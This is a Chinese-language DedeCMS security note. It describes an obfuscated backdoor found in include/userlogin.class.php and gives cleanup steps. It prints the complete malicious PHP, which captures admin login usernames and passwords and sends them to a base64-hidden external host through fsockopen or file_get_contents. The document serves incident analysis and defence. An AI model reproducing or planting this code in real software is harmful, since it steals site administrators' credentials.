需要修改的文件 include/userlogin.class.php
==========================================================
文件说明:
由于之前没有对服务器的目录权限进行严格设计,被注入了很多一句话木马文件,逐一清理后过
了几个月,登录系统后台非常缓慢
追踪登录步骤到include/userlogin.class.php文件,发现该如下恶意代码:
===========================================================
代码影响说明:
该文件会将站点服务器信息,登录的用户名密码,登录地址进行记录
通过 info.msssm.com/in/api.php?var= 地址发送到入侵者服务器
===========================================================
检查处理办法:
全局搜索 “base64_decode”,DedeCMS系统用到该函数的也就是插件安装部分,对文件逐一进行
比对,发现恶意文件,及时删除
并修改掉后台的管理员账号密码和后台管理路径
恶意代码如下:
if((!empty($_POST['userid'])) && (!empty($_POST['pwd']))) {
define(‘UC_ADMINSCRIPTS’, ‘dede’);
define(‘UC_ADMINCPS’, ‘aW5mby5tc3NzbS5jb20=’);
define(‘UC_NOROBOTS’, ‘L2luL2FwaS5′.’waHA/dmFyPQ==’);
define(‘UC_CURSCRIPTS’, function_exists (‘fsockopen’) ? true : false);
define(‘UC_SPIDERHOST’,$_SERVER['HTT'.'P_HOST'] ? $_SERVER['HTT'.'P_HOST'] :
$_SERVER['SERV'.'ER_NAME']);
define(‘UC_SPIDERSELF’,$_SERVER['PHP_S'.'ELF'] ? $_SERVER['PHP_S'.'ELF'] :
$_SERVER['SCRI'.'PT_NAME']);
$uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex
($_POST['userid']),bin2hex($_POST['pwd']));
$ucbaiduget = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode
(‘JmRhdGE9′).join(‘|’,$uc_config_array);
$ucgoogleget = base64_decode (UC_ADMINCPS);
if(UC_CURSCRIPTS) {
$ucsockconn = @fsockopen ($ucgoogleget,80);
@fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1
\r\nHost:".$ucgoogleget."\r\nConnection: Close\r\n\r\n");
@fclose ($ucsockconn);
} else {
@file_get_contents (base64_decode (‘aHR0cDovLw==’).$ucgoogleget.$ucbaiduget);
}
}
来源:织梦的鱼 织梦者-专业dedecms模板制作收集整理
本文DedeCMS程序加强服务器安全设置管理员信息窃取到此结束。每天开心笑,累了就睡觉,醒了就微笑。生活,没什么大不了!小编再次感谢大家对我们的支持!